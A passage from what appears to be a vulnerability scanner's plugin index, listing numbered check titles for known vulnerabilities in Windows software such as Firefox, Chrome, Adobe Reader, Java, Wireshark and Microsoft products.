(924090) [900028] Microsoft Excel Could Allow Remote Code Execution Vulnerabilities (954066) [900025] Microsoft Office Version Detection [900012] Enumerates List of Windows Hotfixes [900006] Microsoft Word Could Allow Remote Code Execution Vulnerability [900004] Microsoft Access Snapshot Viewer ActiveX Control Vulnerability [900003] Apple Safari Detect Script (Windows) [900002] Apple Safari for Windows Multiple Vulnerabilities July-08 [900001] Opera for Windows Unspecified Code Execution Vulnerabilities July-08 [855466] Solaris Update for OpenWindows 3.6.1 108117-06 [855393] Solaris Update for OpenWindows 3.6.2 111626-04 [855334] Solaris Update for OpenWindows 3.6.2 113792-01 [855246] Solaris Update for OpenWindows 3.7.3 119903-02 [855173] Solaris Update for OpenWindows 3.7.0 112811-02 [855057] Solaris Update for OpenWindows 3.6.2 110286-16 [803479] Adobe Acrobat Multiple Vulnerabilities - Windows [803456] Adobe Air Multiple Vulnerabilities - December12 (Windows) [803454] Adobe Air Multiple Vulnerabilities - November12 (Windows) [803451] Adobe Air Multiple Vulnerabilities - October 12 (Windows) [803354] Mozilla Thunderbird Multiple Vulnerabilities-02 November12 (Windows) [803353] Mozilla SeaMonkey Multiple Vulnerabilities-02 November12 (Windows) [803352] Mozilla Thunderbird ESR Multiple Vulnerabilities-01 November12 (Windows) [803351] Mozilla Thunderbird Multiple Vulnerabilities-01 November12 (Windows) [803350] Mozilla SeaMonkey Multiple Vulnerabilities-01 November12 (Windows) [803349] Mozilla Firefox ESR Multiple Vulnerabilities-01 November12 (Windows) [803347] Mozilla Firefox ESR Code Execution Vulnerabilities - November12 (Windows) [803336] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 03) [803335] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 02) [803334] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 01) [803127] Google Chrome Multiple Vulnerabilities-03 Dec2012 (Windows) [803121] Google Chrome Multiple Vulnerabilities-02 Dec2012 (Windows) [803118] Google Chrome Multiple Vulnerabilities-01 Dec2012 (Windows) [803103] Oracle VM VirtualBox Unspecified Denial of Service Vulnerability (Windows) [803102] Pidgin MXit Message Parsing Buffer Overflow Vulnerability (Windows) [803086] LibreOffice XML Manifest Handling Buffer Overflow Vulnerabilities (Windows) [803084] LibreOffice Graphic Object Loading Buffer Overflow Vulnerability (Windows) [803083] OpenOffice Multiple Buffer Overflow Vulnerabilities - Dec12 (Windows) [803081] Adobe Photoshop Camera Raw Plug-in Code Execution Vulnerabilities (Windows) [803074] Adobe Flash Player Multiple Vulnerabilities - December12 (Windows) [803070] Wireshark Multiple Dissector Multiple Vulnerabilities - Dec12 (Windows) [803068] Wireshark Multiple Dissector Multiple DoS Vulnerabilities - Dec12 (Windows) [803064] LibreOffice Import Files Denial of Service Vulnerabilities (Windows) [803061] Mozilla Firefox Code Execution Vulnerabilities - November12 (Windows) [803059] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803057] Mozilla Firefox Multiple Vulnerabilities-02 November12 (Windows) [803055] Mozilla Firefox Multiple Vulnerabilities-01 November12 (Windows) [803047] Apple QuickTime Multiple Vulnerabilities - Nov12 (Windows) [803044] Adobe Flash Player Multiple Vulnerabilities - November12 (Windows) [803043] RealPlayer Watch Folders Function Buffer Overflow Vulnerability (Windows) [803040] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803038] Google SketchUp '.SKP' File Memory Corruption Vulnerability (Windows) [803028] Microsoft Internet Explorer Remote Code Execution Vulnerability (2757760) [803025] Adobe Photoshop PNG Image Processing Buffer Overflow Vulnerabilities (Windows) [803021] Oracle Java SE JRE AWT Component Unspecified Vulnerability - (Windows) [803020] Oracle Java SE JRE Multiple Remote Code Execution Vulnerabilities - (Windows) [803017] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803015] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803013] Mozilla Products Memory Corruption Vulnerabilities - August12 (Windows) [803011] Mozilla Products Multiple Vulnerabilities - August12 (Windows) [803001] Opera Multiple Vulnerabilities - August12 (Windows) [802996] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Windows) [802994] Mozilla Firefox Multiple Vulnerabilities-01 (Windows) [802991] Mozilla Firefox Security Bypass Vulnerabilities - Oct 12 (Windows) [802989] Mozilla Firefox Multiple Vulnerabilities - Oct 12 (Windows) [802986] Adobe Flash Player Multiple Vulnerabilities - October 12 (Windows) [802985] VERITAS Backup Exec Remote Agent Windows Servers BOF Vulnerability [802978] Wireshark LDP PPP and HSRP dissector Multiple Vulnerabilities (Windows) [802975] Google Chrome Windows Kernel Memory Corruption Vulnerability [802972] Google Chrome Multiple Vulnerabilities - Sep12 (Windows-01) [802962] Apple iTunes Multiple Vulnerabilities - Sep 12 (Windows) [802960] Adobe LiveCycle Designer Untrusted Search Path Vulnerability (Windows) [802954] Adobe Reader Multiple Unspecified Vulnerabilities - Windows [802952] Adobe Flash Player Multiple Vulnerabilities -01 August 12 (Windows) [802951] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(02) - (Windows) [802950] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - (Windows) [802949] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(01) - (Windows) [802948] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities - (Windows) [802947] Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows) [802945] Wireshark Multiple Vulnerabilities(01) - August 2012 (Windows) [802944] Wireshark Multiple Vulnerabilities - August 2012 (Windows) [802943] Wireshark GSM RLC MAC dissector Buffer Overflow Vulnerability (Windows) [802940] Adobe Flash Player Font Parsing Code Execution Vulnerability - (Windows) [802938] Adobe Shockwave Player Multiple Vulnerabilities - August 2012 (Windows) [802936] Adobe Reader Multiple Vulnerabilities - Windows [802935] Pidgin 'Libpurple' Cipher API Information Disclosure Vulnerability (Windows) [802932] Google Chrome PDF Viewer Multiple Vulnerabilities (Windows) [802928] Google Chrome Multiple Vulnerabilities - August 12 (Windows) [802925] Apple Safari Multiple Vulnerabilities - Aug 2012 (Windows) [802922] VLC Media Player OGG Demuxer Buffer Overflow Vulnerability (Windows) [802920] VLC Media Player 'MP4' Denial of Service Vulnerability (Windows) [802917] Google Chrome Multiple Vulnerabilities(01) - July 12 (Windows) [802912] Microsoft Unauthorized Digital Certificates Spoofing Vulnerability (2728973) [802907] Wireshark Multiple Denial of Service Vulnerabilities - July 12 (Windows) [802906] Pidgin MSN and XMPP Denial of Service Vulnerabilities (Windows) [802898] Wireshark PPP And NFS Dissector Denial of Service Vulnerabilities (Windows) [802895] Mozilla Products Memory Corruption Vulnerabilities - July12 (Windows) [802893] Mozilla Products Certificate Page Clickjacking Vulnerability (Windows) [802891] Mozilla Firefox Multiple Vulnerabilities - July12 (Windows) [802889] Mozilla Products Multiple Vulnerabilities - July12 (Windows) [802886] Microsoft Sidebar and Gadgets Remote Code Execution Vulnerability (2719662) [802880] Google Chrome Multiple Vulnerabilities - July 12 (Windows) [802871] Adobe Flash Player Multiple Vulnerabilities June-2012 (Windows) [802869] Mozilla Products 'jsinfer.cpp' Denial of Service Vulnerability (Windows) [802865] Mozilla Products Multiple Vulnerabilities - June12 (Windows) [802864] Microsoft XML Core Services Remote Code Execution Vulnerability (2719615) [802848] Google Chrome Multiple Denial of Service Vulnerabilities - May 12 (Windows) [802842] Mozilla Products Security Bypass Vulnerability - May12 (Windows) [802840] Mozilla Products Multiple Vulnerabilities - May12 (Windows) [802835] Google Chrome Multiple Vulnerabilities-02 - April 12 (Windows) [802820] Mozilla Products Multiple Vulnerabilities - Mar12 (Windows) [802811] Adobe Flash Player Multiple Vulnerabilities (Windows) - Mar12 [802807] Google Chrome Multiple Denial of Service Vulnerabilities - March12 (Windows) [802806] Microsoft IIS Default Welcome Page Information Disclosure Vulnerability [802803] Adobe Flash Player Multiple Vulnerabilities (Windows) - Feb12 [802796] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Windows) [802795] Apple QuickTime Multiple Vulnerabilities - (Windows) [802792] Google Chrome Multiple Vulnerabilities - May 12 (Windows) [802790] Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows) [802782] Adobe Photoshop BOF and Use After Free Vulnerabilities (Windows) [802781] Adobe Flash Professional JPG Object Processing BOF Vulnerability (Windows) [802779] Adobe Shockwave Player Multiple Code Execution and DoS Vulnerabilities (Windows) [802774] Microsoft VPN ActiveX Control Remote Code Execution Vulnerability (2695962) [802772] Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows) [802761] Wireshark Multiple Vulnerabilities - April 12 (Windows) [802760] Wireshark IEEE 802.11 Dissector Denial of Service Vulnerability (Windows) [802759] Wireshark Multiple Denial of Service Vulnerabilities - April 12 (Windows) [802748] Adobe Reader Multiple Vulnerabilities April-2012 (Windows) [802732] Google Chrome Multiple Vulnerabilities - April 12 (Windows) [802726] Microsoft SMB Signing Disabled [802722] VLC Media Player Multiple Vulnerabilities - Mar 12 (Windows) [802717] Google Chrome 'History navigation' Arbitrary Code Execution Vulnerability (Windows) [802714] Google Chrome 'GPU process' Multiple Vulnerabilities (Windows) [802713] Pidgin Multiple Denial of Service Vulnerabilities (Windows) [802708] Microsoft Internet Explorer Code Execution and DoS Vulnerabilities [802700] Google Chrome 'HTTP session' Information Disclosure Vulnerability (Windows) [802684] IBM Director CIM Server CIMListener Directory Traversal Vulnerability (Windows) [802681] Oracle Java SE Hash Collision DoS Vulnerability (Windows) [802680] Oracle Java SE 'MurmurHash' Algorithm Hash Collision DoS Vulnerability (Windows) [802677] CA ARCserve Backup RPC Services Multiple Vulnerabilities (Windows) [802670] PHP pdo_sql_parser.re 'PDO' extension DoS vulnerability (Windows) [802652] Opera URL Processing Arbitrary Code Execution Vulnerability (Windows) [802649] Opera Multiple Denial of Service Vulnerabilities - June12 (Windows) [802646] Opera Multiple Vulnerabilities - June12 (Windows) [802612] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 03) [802611] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 02) [802610] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 01) [802600] IBM SPSS SamplePower 'VsVIEW6' ActiveX Control Multiple Code Execution Vulnerabilities (Windows) [802597] Google Chrome Multiple Vulnerabilities - February 12 (Windows 01) [802594] Google Chrome Multiple Vulnerabilities - February 12 (Windows) [802592] Mozilla Products XBL Binding Memory Corruption Vulnerability - (Windows) [802591] PHP 'magic_quotes_gpc' Directive Security Bypass Vulnerability (Windows) [802590] PHP 'php_register_variable_ex()' Remote Code Execution Vulnerability (Windows) [802581] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows 01) [802580] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows) [802579] Mozilla Products IPv6 Literal Syntax Cross Domain Information Disclosure Vulnerability (Windows) [802566] PHP Multiple Denial of Service Vulnerabilities (Windows) [802562] Strawberry Perl Modules Multiple Vulnerabilities (Windows) [802558] Adobe Reader/Acrobat Multiple Memory Corruption Vulnerabilities - Windows [802557] LibreOffice 'DOC' File Denial of Service Vulnerability (Windows) [802547] Mozilla Firefox Cache Objects History Enumeration Weakness Vulnerability (Windows) [802545] Mozilla Products Multiple Information Disclosure Vulnerabilities - (Windows) [802542] Adobe Reader/Acrobat 'U3D' Component Memory Corruption Vulnerability - Windows [802540] Adobe Flash Player 'SWF' File Multiple Code Execution Vulnerability - Windows [802518] Mozilla Products XSS and Memory Corruption Vulnerabilities (Windows) [802517] Mozilla Products Privilege Escalation Vulnerabily (Windows) [802511] Mozilla Products Multiple Vulnerabilities (Windows) [802510] Mozilla Products Browser Engine Denial of Service Vulnerabilities (Windows) [802509] Mozilla Products 'NoWaiverWrapper' Privilege Escalation Vulnerability (Windows) [802508] Adobe Shockwave Player Multiple Vulnerabilities (Windows) - Nov 2011 [802505] FFFTP Untrusted Search Path Vulnerability (Windows) [802504] PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows) [802503] Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows) [802502] Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows) [802499] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802496] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802490] Google Chrome Multiple Vulnerabilities - Nov2012 (Windows) [802488] VLC Media Player 'libpng_plugin' Denial of Service Vulnerability (Windows) [802485] Adobe Shockwave Player Multiple Vulnerabilities Nov-2012 (Windows) [802482] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-04 oct12 (Windows) [802481] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-03 oct12 (Windows) [802480] VLC Media Player TiVo Demuxer Double Free Vulnerability (Windows) [802479] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-02 oct12 (Windows) [802478] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-01 Oct (Windows) [802473] Google Chrome Multiple Vulnerabilities-02 Oct12 (Windows) [802470] Google Chrome Multiple Vulnerabilities-01 Oct12 (Windows) [802468] Compatibility Issues Affecting Signed Microsoft Binaries (2749655) [802462] Microsoft ActiveSync Null Pointer Dereference Denial Of Service Vulnerability [802451] Google Chrome Multiple Vulnerabilities - Sep12 (Windows) [802450] Opera Address Bar Spoofing Vulnerability (Windows) [802444] XnView Multiple Image Decompression Heap Overflow Vulnerabilities (Windows) [802443] XnView PSD Record Type Parsing Integer Overflow Vulnerabilities (Windows) [802435] Opera 'X.509' Certificates Spoofing Vulnerability (Windows) [802420] VLC Media Player '.amr' File Denial of Service Vulnerability (Windows) [802403] MS Windows Fraudulent Digital Certificates Spoofing Vulnerability (2641690) [802398] Adobe Shockwave Player Multiple Vulnerabilities - Feb 2012 (Windows) [802395] Opera Large Integer Argument Denial of Service Vulnerability (Windows) [802374] Google Chrome Multiple Denial of Service Vulnerabilities - January12 (Windows) [802365] Opera Cache History Information Disclosure Vulnerability (Windows) [802363] Opera Multiple Information Disclosure Vulnerabilities (Windows) [802361] Opera Multiple Vulnerabilities - December11 (Windows) [802358] Google Chrome Cache History Information Disclosure Vulnerabilities (Windows) [802355] Google Chrome Multiple Information Disclosure Vulnerabilities (Windows) [802349] PHP EXIF Header Denial of Service Vulnerability (Windows) [802345] Google Chrome Multiple Vulnerabilities - November11 (Windows) [802343] ChaSen Buffer Overflow Vulnerability (Windows) [802338] Google Chrome Mozilla Network Security Services Privilege Escalation Vulnerability (Windows) [802332] Opera Extended Validation Information Disclosure Vulnerabilities (Windows) [802330] PHP Multiple Vulnerabilities (Windows) - Sep 2011 [802326] Google Chrome multiple vulnerabilities - September11 (Windows) [802316] Google Chrome Multiple Vulnerabilities - August11 (Windows) [802314] Ecava IntegraXor Multiple Cross-Site Scripting Vulnerabilities (Windows) [802313] Google Picasa JPEG Image Processing Remote Code Execution Vulnerability (Windows) [802309] XnView File Search Path Executable File Injection Vulnerability (Windows) [802303] Google Chrome WebGL Texture Information Disclosure Vulnerability (Windows) [802300] Tor Directory Authority 'policy_summarize' Denial of Service Vulnerability (Windows) [802292] IBM Informix Dynamic Server 'oninit.exe' Buffer Overflow Vulnerability (Windows) [802287] Microsoft Internet Explorer Cache Objects History Information Disclosure Vulnerability [802286] Microsoft Internet Explorer Multiple Information Disclosure Vulnerabilities [802284] Apple Safari JavaScript Implementation Information Disclosure Vulnerability (Windows) [802282] Apple Safari WebKit Information Disclosure Vulnerability (Windows) [802278] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802277] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802276] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows04) [802275] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows03) [802274] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows02) [802273] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows01) [802262] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802255] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802249] Wireshark Lua Script File Arbitrary Code Execution Vulnerability (Windows) [802248] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802237] Apple Safari Secure Cookie Security Bypass Vulnerability (Windows) [802227] IBM Lotus Symphony Multiple Vulnerabilities (Windows) [802219] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 04 [802218] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 03 [802217] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 02 [802216] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 01 [802215] Mozilla Firefox Security Bypass Vulnerability July-11 (Windows) [802214] Mozilla Products Multiple Denial of Service Vulnerabilities July-11 (Windows) [802213] Mozilla Products Multiple Vulnerabilities July-11 (Windows) [802212] Mozilla Firefox Multiple Vulnerabilities July-11 (Windows) [802211] Mozilla Products WebGL Information Disclosure Vulnerability July-11 (Windows) [802206] Adobe Products Unspecified Cross-Site Scripting Vulnerability June-2011 (Windows) [802203] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802202] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802201] Wireshark 'bytes_repr_len' Function Denial of Service Vulnerability (Windows) [802200] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802198] Apple QuickTime Multiple Denial of Service Vulnerabilities - (Windows) [802175] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows 01) [802174] Mozilla Products Enter Key Dialog Bypass and Use-After-Free Memory Corruption Vulnerabilities (Windows) [802173] Mozilla Products 'YARR' Code Execution Vulnerability (Windows) [802172] Mozilla Products Same Origin Policy Bypass Vulnerability (Windows) [802171] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities (Windows) [802170] Mozilla Firefox Memory Corruption and Integer Underflow Vulnerabilities (Windows) [802169] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows) [802166] Adobe Reader and Acrobat Multiple Vulnerabilities September-2011 (Windows) [802165] Adobe Reader Unspecified Vulnerability (Windows) [802153] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802152] Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows) [802151] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802150] Mozilla Products Multiple Vulnerabilities (Windows) [802149] Mozilla Firefox Untrusted Search Path Vulnerability (Windows) [802147] Mozilla Products 'SVG' Code Execution Vulnerability (Windows) [802141] Opera 'HTTPS-Session' Multiple Vulnerabilities (Windows) [802138] Mozilla Firefox Multiple Vulnerabilities August-11 (Windows) [802133] Apple QuickTime Multiple Buffer Overflow Vulnerabilities (Windows) [802126] Google Chrome 'GetWidget' methods DoS Vulnerability (Windows) [802119] VLC Media Player 'AMV' Denial of Service Vulnerability (Windows) [802113] Opera Browser 'SRC' Denial of Service Vulnerability (Windows) [802112] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802111] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802110] Adobe Reader and Acrobat Multiple BOF Vulnerabilities June-2011 (Windows) [802107] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802102] Google Chrome Multiple Vulnerabilities - June 11(Windows) [802100] Mozilla Firefox SSL Certificate Spoofing Vulnerability (Windows) [801951] Novell iPrint Client 'printer-url' Multiple BOF Vulnerabilities (Windows) [801935] Microsoft Silverlight Multiple Memory Leak Vulnerabilities [801934] Microsoft Silverlight Version Detection [801921] Adobe Products Arbitrary Code Execution Vulnerability (Windows) [801905] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities March-11 (Windows) [801904] Mozilla Products Buffer Overflow Vulnerability March-11 (Windows) [801903] Mozilla Products Multiple Unspecified Vulnerabilities March-11 (Windows) [801902] Mozilla Products Multiple Vulnerabilities March-11 (Windows) [801898] TigerVNC SSL Certificate Validation Security Bypass Vulnerability (Windows) [801897] TigerVNC Version Detection (Windows) [801890] Google Chrome Multiple Denial of Service Vulnerabilities - May11 (Windows) [801887] Mozilla Products Unspecified Vulnerability May-11 (Windows) [801886] Mozilla Firefox Multiple Unspecified Vulnerabilities May-11 (Windows) [801885] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 02 [801884] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 01 [801883] Mozilla Products Multiple Vulnerabilities May-11 (Windows) [801878] Google Chrome multiple vulnerabilities - May11 (Windows) [801876] Microsoft Internet Explorer 'msxml.dll' Information Disclosure Vulnerability [801875] Mozilla Firefox Information Disclosure Vulnerability (Windows) [801872] Synergy Protocol Information Disclosure Vulnerability (Windows) [801871] Synergy Version Detection (Windows) [801855] Google Chrome multiple vulnerabilities - March 11 (Windows) [801847] Adobe Flash Player Multiple Vulnerabilities February-2011 (Windows) [801844] Adobe Reader and Acrobat Multiple Vulnerabilities February-2011 (Windows) [801831] Microsoft Internet Explorer Incorrect GUI Display Vulnerability [801830] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability [801825] Google Chrome multiple vulnerabilities - Jan11 (Windows) [801797] Python Multiple Vulnerabilities (Windows) [801795] Python Version Detection (Windows) [801792] Adobe Flash Player Multiple Vulnerabilities May-2011 (Windows) [801790] Perl Denial of Service Vulnerability (Windows) [801789] Google Chrome 'Sandbox' Remote Code Execution Vulnerability (Windows) [801788] Opera Browser 'SELECT' HTML Tag Remote Memory Corruption Vulnerability (Windows) [801786] Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows) [801785] Wireshark X.509if Dissector Denial of service vulnerability (Windows) [801784] VLC Media Player 'MP4_ReadBox_skcr()' Buffer Overflow Vulnerability (Windows) [801782] VLC Media Player 'Bookmark Creation' Buffer Overflow Vulnerability (Windows) [801779] RealNetworks RealPlayer 'OpenURLInDefaultBrowser()' Code Execution Vulnerability (Windows) [801776] Google Chrome 'GPU process' Multiple Code Execution Vulnerabilities (Windows) [801773] Google Chrome 'WebKit' CSS Implementation DoS Vulnerability (Windows) [801772] Rsync Multiple Denial of Service Vulnerabilities (Windows) [801771] Perl Laundering Security Bypass Vulnerability (Windows) [801770] Google Picasa Insecure Library Loading Arbitrary Code Execution Vulnerability (Windows) [801769] Google Picasa Version Detection (Windows) [801768] RealNetworks RealPlayer IVR File Processing Buffer Overflow Vulnerability (Windows) [801763] Google Chrome Multiple Vulnerabilities - March 11(Windows) [801761] Wireshark Denial of Service Vulnerability March-11 (Windows) [801758] Wireshark Denial of Service Vulnerability March-11 (Windows) [801757] Wireshark Multiple Vulnerabilities March-11 (Windows) [801756] Wireshark Denial of Service Vulnerability - March-11 (Windows) [801755] Wireshark Multiple Vulnerabilities - March-11 (Windows) [801749] RealNetworks RealPlayer Buffer Overflow Vulnerability (Windows) [801747] Google Chrome Multiple Denial of Service Vulnerabilities - February 11(Windows) [801742] Wireshark Denial of Service Vulnerability (Windows) [801739] Google Chrome multiple vulnerabilities - February 11(Windows) [801728] Opera Browser Multiple Vulnerabilities Feb-11 (Windows) [801726] VLC Media Player 'CDG decoder' multiple buffer overflow vulnerabilities (Windows) [801725] Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593) [801723] Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege (939778) [801721] Microsoft Active Directory Denial of Service Vulnerability (953235) [801715] Microsoft XML Core Services Remote Code Execution Vulnerability (936227) [801714] Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782) [801709] Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078) [801708] Vulnerability in Windows Media File Format Could Allow Remote Code Execution [801707] Microsoft Internet Explorer mshtml.dll Remote Memory Corruption Vulnerability (942615) [801704] Microsoft Internet Information Services Privilege Elevation Vulnerability (942831) [801702] Microsoft Internet Explorer HTML Rendering Remote Memory Corruption Vulnerability (944533) [801680] Apple QuickTime Multiple vulnerabilities - Dec10 (Windows) [801678] Google Chrome multiple vulnerabilities - Dec10 (Windows) [801677] Microsoft WMI Administrative Tools ActiveX Control Remote Code Execution Vulnerabilities [801667] Google Chrome multiple vulnerabilities - Dec 10(Windows) [801637] Mozilla Firefox Security Bypass Vulnerability (Windows) [801629] Adobe Flash Player Multiple Vulnerabilities (Windows) [801606] Microsoft Internet Explorer 'mshtml.dll' Information Disclosure Vulnerability [801597] Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability [801596] Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability [801595] Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities [801594] Microsoft PowerPoint 2007 OfficeArt Atom Remote Code Execution Vulnerability [801581] MS Windows HID Functionality(Over USB) Code Execution Vulnerability [801561] VMware Products Tools Local Privilege Escalation Vulnerability (Windows) [801540] Google Chrome multiple vulnerabilities - November 10(Windows) [801530] Oracle Java SE Multiple Vulnerabilities (Windows) [801524] Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows) [801520] Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability [801506] RealNetworks RealPlayer Multiple Vulnerabilities (Windows) [801499] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801498] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801497] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801495] Opera Browser Multiple Vulnerabilities December-10 (Windows) [801491] Microsoft 'hxvz.dll' ActiveX Control Memory Corruption Vulnerability (948881) [801489] Microsoft Office Graphics Filters Remote Code Execution Vulnerabilities (968095) [801488] Microsoft Internet Explorer Data Stream Handling Remote Code Execution Vulnerability (947864) [801485] Microsoft Pragmatic General Multicast (PGM) Denial of Service Vulnerability (950762) [801481] Microsoft Wireless LAN AutoConfig Service Remote Code Execution Vulnerability (970710) [801480] Microsoft Web Services on Devices API Remote Code Execution Vulnerability (973565) [801477] Adobe Products Content Code Execution Vulnerability (Windows) [801475] Mozilla Firefox Unspecified Vulnerability Oct-10 (Windows) [801474] Opera Browser Multiple Vulnerabilities October-10 (Windows) [801473] Google Chrome multiple vulnerabilities - October 10(Windows) [801471] Mozilla Products Multiple Cross-site Scripting Vulnerabilities (Windows) [801470] Mozilla Products Multiple Unspecified Vulnerabilities October-10(Windows) [801469] Mozilla Products Unspecified Vulnerability (Windows) [801468] Mozilla Products Multiple Unspecified Vulnerabilities (Windows) [801467] Mozilla Products Multiple Vulnerabilities October-10 (Windows) [801465] Adobe Flash Player Untrusted search path vulnerability (windows) [801460] Google Chrome multiple unspecified vulnerabilities - October 10(Windows) [801452] Mozilla Products 'SJOW' Arbitrary Code Execution Vulnerability (Windows) [801451] Mozilla Products 'SJOW' Multiple Vulnerabilities (Windows) [801450] Mozilla Products Multiple Vulnerabilities sep-10 (Windows) [801447] Google Chrome multiple vulnerabilities (Windows) Sep10 [801429] VLC Media Player Meta-Information Denial of Service Vulnerability (Windows) [801423] Novell iPrint Client Multiple Security Vulnerabilities (Windows) [801399] MS Windows Insecure Library Loading Remote Code Execution Vulnerabilities (2269637) [801386] Mozilla Products Multiple Vulnerabilitie july-10 (Windows) [801385] Mozilla Products Multiple Vulnerabilities jul-10 (Windows) [801365] Adobe Acrobat and Reader Multiple Vulnerabilities -July10 (Windows) [801358] MS Windows Help and Support Center Remote Code Execution Vulnerability [801349] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability (June-10) [801348] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability -june 10 [801347] Mozilla Firefox 'IFRAME' Denial Of Service vulnerability (Windows) [801345] Microsoft .NET 'ASP.NET' Cross-Site Scripting vulnerability [801344] Microsoft .NET '__VIEWSTATE' Cross-Site Scripting vulnerability [801342] Microsoft ASP.NET Cross-Site Scripting vulnerability [801331] Opera Browser 'document.write()' Code execution Vulnerability (Windows) [801330] Microsoft Internet Explorer Cross Site Data Leakage Vulnerability [801329] Google Chrome Cross Site Data Leakage Vulnerability (Windows) [801319] VMware Products Multiple Vulnerabilities (Windows) [801302] Skype Extras Manager Unspecified Vulnerability (Windows) [801301] Skype Version Detection (Windows) [801257] Opera Browser Multiple Vulnerabilities August-10 (Windows) [801216] Opera 'IFRAME' Denial Of Service vulnerability (Windows) [801109] Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09 [801000] Visualization Library Multiple Unspecified Vulnerabilities (Windows) [800999] Visualization Library Version Detection (Windows) [800968] Microsoft SharePoint Team Services Information Disclosure Vulnerability [800967] Perl UTF-8 Regular Expression Processing DoS Vulnerability (Windows) [800966] Perl Version Detection (Windows) [800910] Microsoft Internet Explorer Buffer Overflow Vulnerability - Jul09 [800902] Microsoft Internet Explorer XSS Vulnerability - July09 [800872] Microsoft Internet Explorer 'li' Element DoS Vulnerability - Sep09 [800863] Microsoft Internet Explorer XML Document DoS Vulnerability - Aug09 [800861] Microsoft Internet Explorer 'findText()' Unicode Parsing DoS Vulnerability [800845] Microsoft Office Web Components ActiveX Control Code Execution Vulnerability [800829] Microsoft Video ActiveX Control 'msvidctl.dll' BOF Vulnerability [800770] Google Chrome Multiple Vulnerabilities Windows - May10 [800761] HP System Management Homepage Unspecified Vulnerability (Windows) [800755] Mozilla Products Firebug Code Execution Vulnerability (Windows) [800753] Mozilla Products Multiple Vulnerabilitie Apr-10 (Windows) [800752] Mozilla Products Multiple Code Execution vulnerabilities (Windows [800751] Mozilla Products 'nsTreeSelection' Denial of Service vulnerability (Windows) [800750] Mozilla Products Denial of Service Vulnerability (Windows) [800742] Microsoft Internet Explorer Unspecified vulnerability [800700] Microsoft GDIPlus PNG Infinite Loop Vulnerability [800669] Microsoft Internet Explorer Denial Of Service Vulnerability - July09 [800505] Microsoft HTML Help Workshop buffer overflow vulnerability [800499] Oracle Java SE Multiple Vulnerabilities (Windows) [800481] Microsoft SharePoint Cross Site Scripting Vulnerability [800461] 